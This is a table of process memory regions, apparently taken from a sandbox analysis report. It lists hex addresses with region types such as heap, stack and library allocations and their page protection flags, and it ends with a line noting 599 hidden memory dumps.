133E7ED0000
|
heap
|
page read and write
|
||
|
2ABE000
|
stack
|
page read and write
|
||
|
A5D32A3000
|
stack
|
page read and write
|
||
|
246BE415000
|
heap
|
page read and write
|
||
|
22BCBA8A000
|
heap
|
page read and write
|
||
|
22BCDFEE000
|
heap
|
page read and write
|
||
|
246C013D000
|
heap
|
page read and write
|
||
|
A5D33AE000
|
stack
|
page read and write
|
||
|
246BE426000
|
heap
|
page read and write
|
||
|
133E9EF1000
|
heap
|
page read and write
|
||
|
246C05D1000
|
heap
|
page read and write
|
||
|
295005B8000
|
trusted library allocation
|
page read and write
|
||
|
246C060E000
|
heap
|
page read and write
|
||
|
295019BC000
|
trusted library allocation
|
page read and write
|
||
|
246BE35F000
|
heap
|
page read and write
|
||
|
246C01DF000
|
heap
|
page read and write
|
||
|
246C01F3000
|
heap
|
page read and write
|
||
|
246BE360000
|
heap
|
page read and write
|
||
|
246C0326000
|
heap
|
page read and write
|
||
|
246C0163000
|
heap
|
page read and write
|
||
|
7FFB49C72000
|
trusted library allocation
|
page read and write
|
||
|
246C019B000
|
heap
|
page read and write
|
||
|
22BCE069000
|
heap
|
page read and write
|
||
|
22BCE1F8000
|
heap
|
page read and write
|
||
|
2A7E000
|
stack
|
page read and write
|
||
|
A5D474D000
|
stack
|
page read and write
|
||
|
133E7F25000
|
heap
|
page read and write
|
||
|
23C54FB000
|
stack
|
page read and write
|
||
|
133E7FC2000
|
heap
|
page read and write
|
||
|
246C05F6000
|
heap
|
page read and write
|
||
|
22BCBA35000
|
heap
|
page read and write
|
||
|
133EA050000
|
heap
|
page execute and read and write
|
||
|
246C03B7000
|
heap
|
page read and write
|
||
|
246C014A000
|
heap
|
page read and write
|
||
|
133E7FBC000
|
heap
|
page read and write
|
||
|
246C0180000
|
heap
|
page read and write
|
||
|
22BCB9E5000
|
heap
|
page read and write
|
||
|
133E804D000
|
heap
|
page read and write
|
||
|
246BE2F8000
|
heap
|
page read and write
|
||
|
246C014B000
|
heap
|
page read and write
|
||
|
FC3000
|
heap
|
page read and write
|
||
|
BBD05FE000
|
stack
|
page read and write
|
||
|
22BCBA32000
|
heap
|
page read and write
|
||
|
246C0156000
|
heap
|
page read and write
|
||
|
22BCE0BC000
|
heap
|
page read and write
|
||
|
133E7F30000
|
heap
|
page read and write
|
||
|
22BCBA8A000
|
heap
|
page read and write
|
||
|
7FFB49E80000
|
trusted library allocation
|
page read and write
|
||
|
246C05D2000
|
heap
|
page read and write
|
||
|
22BCD7F7000
|
heap
|
page read and write
|
||
|
133803D4000
|
trusted library allocation
|
page read and write
|
||
|
3B3E000
|
stack
|
page read and write
|
||
|
373E000
|
stack
|
page read and write
|
||
|
1339006E000
|
trusted library allocation
|
page read and write
|
||
|
A5D3AFE000
|
stack
|
page read and write
|
||
|
246C0339000
|
heap
|
page read and write
|
||
|
7FFB49F40000
|
trusted library allocation
|
page read and write
|
||
|
246C02B9000
|
heap
|
page read and write
|
||
|
22BCE0BA000
|
heap
|
page read and write
|
||
|
13380119000
|
trusted library allocation
|
page read and write
|
||
|
1338066C000
|
trusted library allocation
|
page read and write
|
||
|
A5D37FE000
|
stack
|
page read and write
|
||
|
246BE339000
|
heap
|
page read and write
|
||
|
246C0607000
|
heap
|
page read and write
|
||
|
133E99C0000
|
heap
|
page execute and read and write
|
||
|
246C0136000
|
heap
|
page read and write
|
||
|
22BCD800000
|
heap
|
page read and write
|
||
|
22BCBA7D000
|
heap
|
page read and write
|
||
|
BBD07FB000
|
stack
|
page read and write
|
||
|
246BE35A000
|
heap
|
page read and write
|
||
|
2DFF000
|
stack
|
page read and write
|
||
|
246BE2FE000
|
heap
|
page read and write
|
||
|
246C0639000
|
heap
|
page read and write
|
||
|
7FFB49C74000
|
trusted library allocation
|
page read and write
|
||
|
22BCB9D1000
|
heap
|
page read and write
|
||
|
7FFB49E21000
|
trusted library allocation
|
page read and write
|
||
|
13380127000
|
trusted library allocation
|
page read and write
|
||
|
22BCBA7D000
|
heap
|
page read and write
|
||
|
246C0137000
|
heap
|
page read and write
|
||
|
7FFB49E52000
|
trusted library allocation
|
page read and write
|
||
|
22BCBA8A000
|
heap
|
page read and write
|
||
|
1070000
|
heap
|
page read and write
|
||
|
295073BC000
|
trusted library allocation
|
page read and write
|
||
|
133E9F95000
|
heap
|
page read and write
|
||
|
23C4CFE000
|
stack
|
page read and write
|
||
|
BBCFD25000
|
stack
|
page read and write
|
||
|
7FFB49F50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49E2A000
|
trusted library allocation
|
page read and write
|
||
|
13380113000
|
trusted library allocation
|
page read and write
|
||
|
13380116000
|
trusted library allocation
|
page read and write
|
||
|
133EA520000
|
heap
|
page read and write
|
||
|
246C02E5000
|
heap
|
page read and write
|
||
|
246BE2A0000
|
heap
|
page read and write
|
||
|
7FFB49F80000
|
trusted library allocation
|
page read and write
|
||
|
246C05E1000
|
heap
|
page read and write
|
||
|
246BE41B000
|
heap
|
page read and write
|
||
|
295005AA000
|
trusted library allocation
|
page read and write
|
||
|
A5D3977000
|
stack
|
page read and write
|
||
|
7FFB49E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
22BCBA29000
|
heap
|
page read and write
|
||
|
133E7F70000
|
heap
|
page read and write
|
||
|
22BCD7FB000
|
heap
|
page read and write
|
||
|
246C01E3000
|
heap
|
page read and write
|
||
|
22BCD8F0000
|
remote allocation
|
page read and write
|
||
|
22BCBB45000
|
heap
|
page read and write
|
||
|
246C0148000
|
heap
|
page read and write
|
||
|
7FFB49ED0000
|
trusted library allocation
|
page read and write
|
||
|
246C015B000
|
heap
|
page read and write
|
||
|
22BCB9C0000
|
heap
|
page read and write
|
||
|
13380660000
|
trusted library allocation
|
page read and write
|
||
|
22BCE207000
|
heap
|
page read and write
|
||
|
246C0133000
|
heap
|
page read and write
|
||
|
246C0157000
|
heap
|
page read and write
|
||
|
246BE2FE000
|
heap
|
page read and write
|
||
|
7FFB49D20000
|
trusted library allocation
|
page read and write
|
||
|
133E7FD4000
|
heap
|
page read and write
|
||
|
23C4FFE000
|
stack
|
page read and write
|
||
|
133803ED000
|
trusted library allocation
|
page read and write
|
||
|
22BCD808000
|
heap
|
page read and write
|
||
|
246C015C000
|
heap
|
page read and write
|
||
|
A5D3B7F000
|
stack
|
page read and write
|
||
|
22BCBA31000
|
heap
|
page read and write
|
||
|
246C015C000
|
heap
|
page read and write
|
||
|
2EFF000
|
stack
|
page read and write
|
||
|
A5D33EE000
|
stack
|
page read and write
|
||
|
246BE2F8000
|
heap
|
page read and write
|
||
|
22BCD8F0000
|
remote allocation
|
page read and write
|
||
|
133E9980000
|
trusted library allocation
|
page read and write
|
||
|
246C0190000
|
heap
|
page read and write
|
||
|
CDDACFF000
|
stack
|
page read and write
|
||
|
22BCBA03000
|
heap
|
page read and write
|
||
|
7FFB49EA0000
|
trusted library allocation
|
page read and write
|
||
|
22BCBA7D000
|
heap
|
page read and write
|
||
|
246C064A000
|
heap
|
page read and write
|
||
|
22BCBA37000
|
heap
|
page read and write
|
||
|
295003F3000
|
trusted library allocation
|
page read and write
|
||
|
22BCBB4E000
|
heap
|
page read and write
|
||
|
246C02F9000
|
heap
|
page read and write
|
||
|
7FFB49E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
13380001000
|
trusted library allocation
|
page read and write
|
||
|
133E7F60000
|
trusted library allocation
|
page read and write
|
||
|
246C0602000
|
heap
|
page read and write
|
||
|
246C0168000
|
heap
|
page read and write
|
||
|
246C02BD000
|
heap
|
page read and write
|
||
|
246BE3BE000
|
heap
|
page read and write
|
||
|
22BCE000000
|
heap
|
page read and write
|
||
|
246BE372000
|
heap
|
page read and write
|
||
|
246C0153000
|
heap
|
page read and write
|
||
|
246C0317000
|
heap
|
page read and write
|
||
|
22BCE06E000
|
heap
|
page read and write
|
||
|
22BCE007000
|
heap
|
page read and write
|
||
|
246C02B8000
|
heap
|
page read and write
|
||
|
29500170000
|
heap
|
page execute and read and write
|
||
|
22BCBB40000
|
heap
|
page read and write
|
||
|
A5D46CE000
|
stack
|
page read and write
|
||
|
133800A1000
|
trusted library allocation
|
page read and write
|
||
|
246C05FA000
|
heap
|
page read and write
|
||
|
22BCBA3B000
|
heap
|
page read and write
|
||
|
A5D39FC000
|
stack
|
page read and write
|
||
|
22BCBA8A000
|
heap
|
page read and write
|
||
|
22BCB9D1000
|
heap
|
page read and write
|
||
|
133E9FAF000
|
heap
|
page read and write
|
||
|
246C015C000
|
heap
|
page read and write
|
||
|
22BCD7F5000
|
heap
|
page read and write
|
||
|
246C0683000
|
heap
|
page read and write
|
||
|
246C0330000
|
heap
|
page read and write
|
||
|
246C032A000
|
heap
|
page read and write
|
||
|
22BCD7F1000
|
heap
|
page read and write
|
||
|
23C517E000
|
stack
|
page read and write
|
||
|
1338051B000
|
trusted library allocation
|
page read and write
|
||
|
246C065C000
|
heap
|
page read and write
|
||
|
22BCE0BA000
|
heap
|
page read and write
|
||
|
246C0333000
|
heap
|
page read and write
|
||
|
29500070000
|
heap
|
page read and write
|
||
|
246C0133000
|
heap
|
page read and write
|
||
|
133E9F3C000
|
heap
|
page read and write
|
||
|
246C0306000
|
heap
|
page read and write
|
||
|
246BE420000
|
heap
|
page read and write
|
||
|
246BE2FB000
|
heap
|
page read and write
|
||
|
246C019B000
|
heap
|
page read and write
|
||
|
22BCB9E2000
|
heap
|
page read and write
|
||
|
246C068A000
|
heap
|
page read and write
|
||
|
246C0324000
|
heap
|
page read and write
|
||
|
22BCBB4E000
|
heap
|
page read and write
|
||
|
22BCE1D2000
|
heap
|
page read and write
|
||
|
246C02BE000
|
heap
|
page read and write
|
||
|
133E9F3A000
|
heap
|
page read and write
|
||
|
246C01C4000
|
heap
|
page read and write
|
||
|
246C0636000
|
heap
|
page read and write
|
||
|
246BE2FA000
|
heap
|
page read and write
|
||
|
246C032B000
|
heap
|
page read and write
|
||
|
22BCB8C0000
|
heap
|
page read and write
|
||
|
246C01B4000
|
heap
|
page read and write
|
||
|
246C0340000
|
heap
|
page read and write
|
||
|
29505FBC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49C73000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB49EC0000
|
trusted library allocation
|
page read and write
|
||
|
133E7FFD000
|
heap
|
page read and write
|
||
|
246C0143000
|
heap
|
page read and write
|
||
|
22BCE0B7000
|
heap
|
page read and write
|
||
|
133E8001000
|
heap
|
page read and write
|
||
|
133E7F2D000
|
heap
|
page read and write
|
||
|
246C033E000
|
heap
|
page read and write
|
||
|
246BE2FE000
|
heap
|
page read and write
|
||
|
246C0323000
|
heap
|
page read and write
|
||
|
133E9FB9000
|
heap
|
page read and write
|
||
|
246C0653000
|
heap
|
page read and write
|
||
|
246C0158000
|
heap
|
page read and write
|
||
|
CFB000
|
stack
|
page read and write
|
||
|
246C0626000
|
heap
|
page read and write
|
||
|
246C0683000
|
heap
|
page read and write
|
||
|
13380124000
|
trusted library allocation
|
page read and write
|
||
|
246C0135000
|
heap
|
page read and write
|
||
|
246C033C000
|
heap
|
page read and write
|
||
|
246C0602000
|
heap
|
page read and write
|
||
|
246C015C000
|
heap
|
page read and write
|
||
|
23C4D7E000
|
stack
|
page read and write
|
||
|
22BCBAF0000
|
heap
|
page read and write
|
||
|
22BCBB4C000
|
heap
|
page read and write
|
||
|
246C0341000
|
heap
|
page read and write
|
||
|
246C014F000
|
heap
|
page read and write
|
||
|
2FFF000
|
stack
|
page read and write
|
||
|
295055BC000
|
trusted library allocation
|
page read and write
|
||
|
246C018C000
|
heap
|
page read and write
|
||
|
13390001000
|
trusted library allocation
|
page read and write
|
||
|
23C4DFF000
|
stack
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
246C05F4000
|
heap
|
page read and write
|
||
|
246C0600000
|
heap
|
page read and write
|
||
|
246C0308000
|
heap
|
page read and write
|
||
|
22BCD801000
|
heap
|
page read and write
|
||
|
246C02B7000
|
heap
|
page read and write
|
||
|
133E9FBB000
|
heap
|
page read and write
|
||
|
246C064F000
|
heap
|
page read and write
|
||
|
CDDA4F6000
|
stack
|
page read and write
|
||
|
22BCB9C0000
|
heap
|
page read and write
|
||
|
1338015F000
|
trusted library allocation
|
page read and write
|
||
|
246C0649000
|
heap
|
page read and write
|
||
|
22BCBB4D000
|
heap
|
page read and write
|
||
|
22BCBA30000
|
heap
|
page read and write
|
||
|
246C01EE000
|
heap
|
page read and write
|
||
|
22BCE094000
|
heap
|
page read and write
|
||
|
246BE359000
|
heap
|
page read and write
|
||
|
246BE3BE000
|
heap
|
page read and write
|
||
|
246BE424000
|
heap
|
page read and write
|
||
|
246C065E000
|
heap
|
page read and write
|
||
|
1338042B000
|
trusted library allocation
|
page read and write
|
||
|
246C0306000
|
heap
|
page read and write
|
||
|
246C0334000
|
heap
|
page read and write
|
||
|
7FFB49D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
246C0654000
|
heap
|
page read and write
|
||
|
383E000
|
stack
|
page read and write
|
||
|
246C0320000
|
heap
|
page read and write
|
||
|
246C0139000
|
heap
|
page read and write
|
||
|
22BCBA01000
|
heap
|
page read and write
|
||
|
133EA0F0000
|
heap
|
page read and write
|
||
|
23C547E000
|
stack
|
page read and write
|
||
|
22BCE0BC000
|
heap
|
page read and write
|
||
|
246C0156000
|
heap
|
page read and write
|
||
|
1338001D000
|
trusted library allocation
|
page read and write
|
||
|
22BCB9EC000
|
heap
|
page read and write
|
||
|
22BCBA3F000
|
heap
|
page read and write
|
||
|
246C0610000
|
heap
|
page read and write
|
||
|
22BCE1D0000
|
heap
|
page read and write
|
||
|
246C031C000
|
heap
|
page read and write
|
||
|
29500060000
|
trusted library allocation
|
page read and write
|
||
|
1338011C000
|
trusted library allocation
|
page read and write
|
||
|
1338043C000
|
trusted library allocation
|
page read and write
|
||
|
246C0335000
|
heap
|
page read and write
|
||
|
246C0620000
|
heap
|
page read and write
|
||
|
22BCBA29000
|
heap
|
page read and write
|
||
|
246C0306000
|
heap
|
page read and write
|
||
|
E06000
|
heap
|
page read and write
|
||
|
7FFB49C8C000
|
trusted library allocation
|
page read and write
|
||
|
A5D332F000
|
stack
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
F5B000
|
stack
|
page read and write
|
||
|
7FFB49EB0000
|
trusted library allocation
|
page read and write
|
||
|
246BE41E000
|
heap
|
page read and write
|
||
|
399F000
|
stack
|
page read and write
|
||
|
22BCDA80000
|
heap
|
page read and write
|
||
|
22BCE0BC000
|
heap
|
page read and write
|
||
|
133E9FDC000
|
heap
|
page read and write
|
||
|
246C015C000
|
heap
|
page read and write
|
||
|
246C01F3000
|
heap
|
page read and write
|
||
|
246BE427000
|
heap
|
page read and write
|
||
|
246C0194000
|
heap
|
page read and write
|
||
|
389E000
|
stack
|
page read and write
|
||
|
295023BC000
|
trusted library allocation
|
page read and write
|
||
|
22BCDBD0000
|
trusted library allocation
|
page read and write
|
||
|
133E7FB4000
|
heap
|
page read and write
|
||
|
22BCB9EC000
|
heap
|
page read and write
|
||
|
1060000
|
heap
|
page read and write
|
||
|
BBD03FF000
|
stack
|
page read and write
|
||
|
22BCE1F0000
|
heap
|
page read and write
|
||
|
246C0315000
|
heap
|
page read and write
|
||
|
22BCB9D1000
|
heap
|
page read and write
|
||
|
22BCBA29000
|
heap
|
page read and write
|
||
|
3C3F000
|
stack
|
page read and write
|
||
|
22BCDFFC000
|
heap
|
page read and write
|
||
|
133E7FFB000
|
heap
|
page read and write
|
||
|
246C05EE000
|
heap
|
page read and write
|
||
|
7FFB49F20000
|
trusted library allocation
|
page read and write
|
||
|
246C030D000
|
heap
|
page read and write
|
||
|
246C0332000
|
heap
|
page read and write
|
||
|
246C060B000
|
heap
|
page read and write
|
||
|
246C02E9000
|
heap
|
page read and write
|
||
|
246BE330000
|
heap
|
page read and write
|
||
|
246C0310000
|
heap
|
page read and write
|
||
|
246C0629000
|
heap
|
page read and write
|
||
|
246C032E000
|
heap
|
page read and write
|
||
|
22BCBB25000
|
heap
|
page read and write
|
||
|
246C05FC000
|
heap
|
page read and write
|
||
|
133E7F7C000
|
heap
|
page read and write
|
||
|
A5D387E000
|
stack
|
page read and write
|
||
|
246BE2FD000
|
heap
|
page read and write
|
||
|
22BCE0BA000
|
heap
|
page read and write
|
||
|
246C033E000
|
heap
|
page read and write
|
||
|
7FFB49F70000
|
trusted library allocation
|
page read and write
|
||
|
133804EA000
|
trusted library allocation
|
page read and write
|
||
|
246C03B8000
|
heap
|
page read and write
|
||
|
133E9FA5000
|
heap
|
page read and write
|
||
|
246C0156000
|
heap
|
page read and write
|
||
|
246C0311000
|
heap
|
page read and write
|
||
|
22BCBA46000
|
heap
|
page read and write
|
||
|
246C0156000
|
heap
|
page read and write
|
||
|
22BCBA7D000
|
heap
|
page read and write
|
||
|
7FFB49E10000
|
trusted library allocation
|
page read and write
|
||
|
13380676000
|
trusted library allocation
|
page read and write
|
||
|
246C031D000
|
heap
|
page read and write
|
||
|
A5D3CFB000
|
stack
|
page read and write
|
||
|
7FFB49E70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49F00000
|
trusted library allocation
|
page read and write
|
||
|
23C49EF000
|
stack
|
page read and write
|
||
|
22BCBA3B000
|
heap
|
page read and write
|
||
|
246C0322000
|
heap
|
page read and write
|
||
|
BBD09FB000
|
stack
|
page read and write
|
||
|
246BE360000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
22BCBA52000
|
heap
|
page read and write
|
||
|
22BCBA4C000
|
heap
|
page read and write
|
||
|
7FFB49F10000
|
trusted library allocation
|
page read and write
|
||
|
29504BBC000
|
trusted library allocation
|
page read and write
|
||
|
CDDAAFF000
|
stack
|
page read and write
|
||
|
246BE2FD000
|
heap
|
page read and write
|
||
|
246BE2FA000
|
heap
|
page read and write
|
||
|
246C0240000
|
heap
|
page read and write
|
||
|
246C0311000
|
heap
|
page read and write
|
||
|
22BCBA29000
|
heap
|
page read and write
|
||
|
133E7FB6000
|
heap
|
page read and write
|
||
|
246C016B000
|
heap
|
page read and write
|
||
|
246BFDD0000
|
heap
|
page read and write
|
||
|
295005A0000
|
trusted library allocation
|
page read and write
|
||
|
246C05DF000
|
heap
|
page read and write
|
||
|
246C0152000
|
heap
|
page read and write
|
||
|
23C4C73000
|
stack
|
page read and write
|
||
|
A5D3C7F000
|
stack
|
page read and write
|
||
|
295041BC000
|
trusted library allocation
|
page read and write
|
||
|
133E9EE0000
|
heap
|
page read and write
|
||
|
22BCD9D0000
|
heap
|
page read and write
|
||
|
246C0316000
|
heap
|
page read and write
|
||
|
246C02F1000
|
heap
|
page read and write
|
||
|
39FE000
|
stack
|
page read and write
|
||
|
246C0156000
|
heap
|
page read and write
|
||
|
29500FBC000
|
trusted library allocation
|
page read and write
|
||
|
23C4E7F000
|
stack
|
page read and write
|
||
|
246C0241000
|
heap
|
page read and write
|
||
|
1338053F000
|
trusted library allocation
|
page read and write
|
||
|
22BCDFEE000
|
heap
|
page read and write
|
||
|
246C05DB000
|
heap
|
page read and write
|
||
|
22BCBA03000
|
heap
|
page read and write
|
||
|
133E7EA0000
|
heap
|
page read and write
|
||
|
246C062F000
|
heap
|
page read and write
|
||
|
22BCD4A0000
|
heap
|
page read and write
|
||
|
246C0311000
|
heap
|
page read and write
|
There are 599 hidden memdumps, click here to show them.